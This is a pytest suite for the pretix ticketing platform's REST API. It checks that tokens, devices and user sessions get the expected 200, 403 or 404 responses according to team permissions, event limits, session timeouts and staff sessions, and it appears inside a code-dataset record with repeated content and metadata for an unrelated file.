team.can_change_items = True
team.save()
t = team.tokens.create(name='Foo')
client.credentials(HTTP_AUTHORIZATION='Token ' + t.token)
return client
@pytest.mark.django_db
def test_organizer_allowed(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert resp.status_code == 200
@pytest.mark.django_db
def test_organizer_not_allowed(token_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = token_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_allowed_device(device_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = device_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_existing(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format('o2'))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events(token_client, team, organizer, event, url):
team.all_events = True
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events_device(device_client, device, organizer, event, url):
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events(token_client, organizer, team, event, url):
team.all_events = False
team.save()
team.limit_events.add(event)
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
device.limit_events.add(event)
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed(token_client, organizer, team, event, url):
team.all_events = False
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_existing(token_client, organizer, url, event):
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], True)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == urlset[2]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_not_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], False)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_log_out_after_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
@override_settings(PRETIX_LONG_SESSIONS=False)
def test_ignore_long_session_if_disabled_in_config(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_log_out_after_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_dont_logout_by_relative_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_update_session_activity(user_client, team, organizer, event):
t1 = int(time.time()) - 5
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = t1
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
assert user_client.session['pretix_auth_last_used'] > t1
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_device_subresource_permission_check(device_client, device, organizer, event, urlset):
if urlset == ('get', 'can_change_event_settings', 'settings/', 200):
return
resp = getattr(device_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[1] is None or urlset[1] in device.permission_set():
assert resp.status_code == urlset[3]
else:
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2].format(team_id=team.pk)))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2].format(team_id=team.pk)))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_staff_requires_staff_session(user_client, organizer, team, event, url, user):
team.delete()
user.is_staff = True
user.save()
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
user.staffsession_set.create(date_start=now(), session_key=user_client.session.session_key)
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
| 45.314488
| 145
| 0.681535
|
import time
import pytest
from django.test import override_settings
from django.utils.timezone import now
from pretix.base.models import Organizer
event_urls = [
(None, ''),
(None, 'categories/'),
('can_view_orders', 'invoices/'),
(None, 'items/'),
('can_view_orders', 'orders/'),
('can_view_orders', 'orderpositions/'),
(None, 'questions/'),
(None, 'quotas/'),
('can_view_vouchers', 'vouchers/'),
(None, 'subevents/'),
(None, 'taxrules/'),
('can_view_orders', 'waitinglistentries/'),
('can_view_orders', 'checkinlists/'),
]
event_permission_sub_urls = [
('get', 'can_change_event_settings', 'settings/', 200),
('patch', 'can_change_event_settings', 'settings/', 200),
('get', 'can_view_orders', 'revokedsecrets/', 200),
('get', 'can_view_orders', 'revokedsecrets/1/', 404),
('get', 'can_view_orders', 'orders/', 200),
('get', 'can_view_orders', 'orderpositions/', 200),
('delete', 'can_change_orders', 'orderpositions/1/', 404),
('post', 'can_change_orders', 'orderpositions/1/price_calc/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_orders', 'invoices/', 200),
('get', 'can_view_orders', 'invoices/1/', 404),
('post', 'can_change_orders', 'invoices/1/regenerate/', 404),
('post', 'can_change_orders', 'invoices/1/reissue/', 404),
('get', 'can_view_orders', 'waitinglistentries/', 200),
('get', 'can_view_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/', 400),
('delete', 'can_change_orders', 'waitinglistentries/1/', 404),
('patch', 'can_change_orders', 'waitinglistentries/1/', 404),
('put', 'can_change_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/1/send_voucher/', 404),
('get', None, 'categories/', 200),
('get', None, 'items/', 200),
('get', None, 'questions/', 200),
('get', None, 'quotas/', 200),
('get', None, 'discounts/', 200),
('post', 'can_change_items', 'items/', 400),
('get', None, 'items/1/', 404),
('put', 'can_change_items', 'items/1/', 404),
('patch', 'can_change_items', 'items/1/', 404),
('delete', 'can_change_items', 'items/1/', 404),
('post', 'can_change_items', 'categories/', 400),
('get', None, 'categories/1/', 404),
('put', 'can_change_items', 'categories/1/', 404),
('patch', 'can_change_items', 'categories/1/', 404),
('delete', 'can_change_items', 'categories/1/', 404),
('post', 'can_change_items', 'discounts/', 400),
('get', None, 'discounts/1/', 404),
('put', 'can_change_items', 'discounts/1/', 404),
('patch', 'can_change_items', 'discounts/1/', 404),
('delete', 'can_change_items', 'discounts/1/', 404),
('post', 'can_change_items', 'items/1/variations/', 404),
('get', None, 'items/1/variations/', 404),
('get', None, 'items/1/variations/1/', 404),
('put', 'can_change_items', 'items/1/variations/1/', 404),
('patch', 'can_change_items', 'items/1/variations/1/', 404),
('delete', 'can_change_items', 'items/1/variations/1/', 404),
('get', None, 'items/1/addons/', 404),
('get', None, 'items/1/addons/1/', 404),
('post', 'can_change_items', 'items/1/addons/', 404),
('put', 'can_change_items', 'items/1/addons/1/', 404),
('patch', 'can_change_items', 'items/1/addons/1/', 404),
('delete', 'can_change_items', 'items/1/addons/1/', 404),
('get', None, 'subevents/', 200),
('get', None, 'subevents/1/', 404),
('get', None, 'taxrules/', 200),
('get', None, 'taxrules/1/', 404),
('post', 'can_change_event_settings', 'taxrules/', 400),
('put', 'can_change_event_settings', 'taxrules/1/', 404),
('patch', 'can_change_event_settings', 'taxrules/1/', 404),
('delete', 'can_change_event_settings', 'taxrules/1/', 404),
('get', 'can_change_event_settings', 'sendmail_rules/', 200),
('get', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('post', 'can_change_event_settings', 'sendmail_rules/', 400),
('put', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('patch', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('delete', 'can_change_event_settings', 'sendmail_rules/1/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_vouchers', 'vouchers/1/', 404),
('post', 'can_change_vouchers', 'vouchers/', 201),
('put', 'can_change_vouchers', 'vouchers/1/', 404),
('patch', 'can_change_vouchers', 'vouchers/1/', 404),
('delete', 'can_change_vouchers', 'vouchers/1/', 404),
('get', None, 'quotas/', 200),
('get', None, 'quotas/1/', 404),
('post', 'can_change_items', 'quotas/', 400),
('put', 'can_change_items', 'quotas/1/', 404),
('patch', 'can_change_items', 'quotas/1/', 404),
('delete', 'can_change_items', 'quotas/1/', 404),
('get', None, 'questions/', 200),
('get', None, 'questions/1/', 404),
('post', 'can_change_items', 'questions/', 400),
('put', 'can_change_items', 'questions/1/', 404),
('patch', 'can_change_items', 'questions/1/', 404),
('delete', 'can_change_items', 'questions/1/', 404),
('get', None, 'questions/1/options/', 404),
('get', None, 'questions/1/options/1/', 404),
('put', 'can_change_items', 'questions/1/options/1/', 404),
('patch', 'can_change_items', 'questions/1/options/1/', 404),
('delete', 'can_change_items', 'questions/1/options/1/', 404),
('post', 'can_change_orders', 'orders/', 400),
('patch', 'can_change_orders', 'orders/ABC12/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_paid/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_pending/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_expired/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_canceled/', 404),
('post', 'can_change_orders', 'orders/ABC12/approve/', 404),
('post', 'can_change_orders', 'orders/ABC12/deny/', 404),
('post', 'can_change_orders', 'orders/ABC12/extend/', 400),
('post', 'can_change_orders', 'orders/ABC12/create_invoice/', 404),
('post', 'can_change_orders', 'orders/ABC12/resend_link/', 404),
('post', 'can_change_orders', 'orders/ABC12/regenerate_secrets/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/1/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/1/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/confirm/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/refund/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/process/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/done/', 404),
('get', 'can_view_orders', 'checkinlists/', 200),
('post', 'can_change_orders', 'checkinlists/1/failed_checkins/', 400),
('post', 'can_change_event_settings', 'checkinlists/', 400),
('put', 'can_change_event_settings', 'checkinlists/1/', 404),
('patch', 'can_change_event_settings', 'checkinlists/1/', 404),
('delete', 'can_change_event_settings', 'checkinlists/1/', 404),
('get', 'can_view_orders', 'checkinlists/1/positions/', 404),
('post', 'can_change_orders', 'checkinlists/1/positions/3/redeem/', 404),
('post', 'can_create_events', 'clone/', 400),
('get', 'can_view_orders', 'cartpositions/', 200),
('get', 'can_view_orders', 'cartpositions/1/', 404),
('post', 'can_change_orders', 'cartpositions/', 400),
('delete', 'can_change_orders', 'cartpositions/1/', 404),
('post', 'can_view_orders', 'exporters/invoicedata/run/', 400),
('get', 'can_view_orders', 'exporters/invoicedata/download/bc3f9884-26ee-425b-8636-80613f84b6fa/3cb49ae6-eda3-4605-814e-099e23777b36/', 404),
]
org_permission_sub_urls = [
('get', 'can_change_organizer_settings', 'settings/', 200),
('patch', 'can_change_organizer_settings', 'settings/', 200),
('get', 'can_change_organizer_settings', 'webhooks/', 200),
('post', 'can_change_organizer_settings', 'webhooks/', 400),
('get', 'can_change_organizer_settings', 'webhooks/1/', 404),
('put', 'can_change_organizer_settings', 'webhooks/1/', 404),
('patch', 'can_change_organizer_settings', 'webhooks/1/', 404),
('delete', 'can_change_organizer_settings', 'webhooks/1/', 404),
('get', 'can_manage_customers', 'customers/', 200),
('post', 'can_manage_customers', 'customers/', 201),
('get', 'can_manage_customers', 'customers/1/', 404),
('patch', 'can_manage_customers', 'customers/1/', 404),
('post', 'can_manage_customers', 'customers/1/anonymize/', 404),
('put', 'can_manage_customers', 'customers/1/', 404),
('delete', 'can_manage_customers', 'customers/1/', 404),
('get', 'can_manage_customers', 'memberships/', 200),
('post', 'can_manage_customers', 'memberships/', 400),
('get', 'can_manage_customers', 'memberships/1/', 404),
('patch', 'can_manage_customers', 'memberships/1/', 404),
('put', 'can_manage_customers', 'memberships/1/', 404),
('delete', 'can_manage_customers', 'memberships/1/', 404),
('get', 'can_change_organizer_settings', 'membershiptypes/', 200),
('post', 'can_change_organizer_settings', 'membershiptypes/', 400),
('get', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('patch', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('put', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('delete', 'can_change_organizer_settings', 'membershiptypes/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/', 200),
('post', 'can_manage_gift_cards', 'giftcards/', 400),
('get', 'can_manage_gift_cards', 'giftcards/1/', 404),
('put', 'can_manage_gift_cards', 'giftcards/1/', 404),
('patch', 'can_manage_gift_cards', 'giftcards/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/1/transactions/', 404),
('get', 'can_manage_gift_cards', 'giftcards/1/transactions/1/', 404),
('get', 'can_change_organizer_settings', 'devices/', 200),
('post', 'can_change_organizer_settings', 'devices/', 400),
('get', 'can_change_organizer_settings', 'devices/1/', 404),
('put', 'can_change_organizer_settings', 'devices/1/', 404),
('patch', 'can_change_organizer_settings', 'devices/1/', 404),
('get', 'can_change_teams', 'teams/', 200),
('post', 'can_change_teams', 'teams/', 400),
('get', 'can_change_teams', 'teams/{team_id}/', 200),
('put', 'can_change_teams', 'teams/{team_id}/', 400),
('patch', 'can_change_teams', 'teams/{team_id}/', 200),
('get', 'can_change_teams', 'teams/{team_id}/members/', 200),
('delete', 'can_change_teams', 'teams/{team_id}/members/2/', 404),
('get', 'can_change_teams', 'teams/{team_id}/invites/', 200),
('get', 'can_change_teams', 'teams/{team_id}/invites/2/', 404),
('delete', 'can_change_teams', 'teams/{team_id}/invites/2/', 404),
('post', 'can_change_teams', 'teams/{team_id}/invites/', 400),
('get', 'can_change_teams', 'teams/{team_id}/tokens/', 200),
('get', 'can_change_teams', 'teams/{team_id}/tokens/0/', 404),
('delete', 'can_change_teams', 'teams/{team_id}/tokens/0/', 404),
('post', 'can_change_teams', 'teams/{team_id}/tokens/', 400),
]
event_permission_root_urls = [
('post', 'can_create_events', 400),
('put', 'can_change_event_settings', 400),
('patch', 'can_change_event_settings', 200),
('delete', 'can_change_event_settings', 204),
]
@pytest.fixture
def token_client(client, team):
team.can_view_orders = True
team.can_view_vouchers = True
team.can_change_items = True
team.save()
t = team.tokens.create(name='Foo')
client.credentials(HTTP_AUTHORIZATION='Token ' + t.token)
return client
@pytest.mark.django_db
def test_organizer_allowed(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert resp.status_code == 200
@pytest.mark.django_db
def test_organizer_not_allowed(token_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = token_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_allowed_device(device_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = device_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_existing(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format('o2'))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events(token_client, team, organizer, event, url):
team.all_events = True
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events_device(device_client, device, organizer, event, url):
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events(token_client, organizer, team, event, url):
team.all_events = False
team.save()
team.limit_events.add(event)
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
device.limit_events.add(event)
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed(token_client, organizer, team, event, url):
team.all_events = False
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_existing(token_client, organizer, url, event):
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], True)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == urlset[2]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_not_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], False)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_log_out_after_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
@override_settings(PRETIX_LONG_SESSIONS=False)
def test_ignore_long_session_if_disabled_in_config(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_log_out_after_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_dont_logout_by_relative_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_update_session_activity(user_client, team, organizer, event):
t1 = int(time.time()) - 5
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = t1
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
assert user_client.session['pretix_auth_last_used'] > t1
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_device_subresource_permission_check(device_client, device, organizer, event, urlset):
if urlset == ('get', 'can_change_event_settings', 'settings/', 200):
return
resp = getattr(device_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[1] is None or urlset[1] in device.permission_set():
assert resp.status_code == urlset[3]
else:
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2].format(team_id=team.pk)))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2].format(team_id=team.pk)))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_staff_requires_staff_session(user_client, organizer, team, event, url, user):
team.delete()
user.is_staff = True
user.save()
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
user.staffsession_set.create(date_start=now(), session_key=user_client.session.session_key)
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
| true
| true
|
1c4940b8959cc53cd05290301b2d13364041c21b
| 751
|
py
|
Python
|
archive/migrations/0002_auto_20181215_2009.py
|
WarwickAnimeSoc/aniMango
|
f927c2bc6eb484561ab38172ebebee6f03c8b13b
|
[
"MIT"
] | null | null | null |
archive/migrations/0002_auto_20181215_2009.py
|
WarwickAnimeSoc/aniMango
|
f927c2bc6eb484561ab38172ebebee6f03c8b13b
|
[
"MIT"
] | 6
|
2016-10-18T14:52:05.000Z
|
2020-06-18T15:14:41.000Z
|
archive/migrations/0002_auto_20181215_2009.py
|
